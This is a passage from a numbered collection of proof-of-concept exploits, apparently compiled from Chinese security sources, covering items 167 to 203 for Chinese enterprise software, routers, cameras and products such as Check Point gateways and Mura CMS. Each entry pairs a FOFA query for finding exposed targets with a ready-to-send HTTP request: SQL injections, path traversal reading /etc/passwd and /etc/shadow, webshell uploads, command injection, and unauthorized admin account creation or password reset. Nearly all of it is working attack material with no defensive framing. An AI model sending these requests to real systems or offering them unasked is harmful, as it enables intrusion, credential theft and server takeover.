User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Get the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--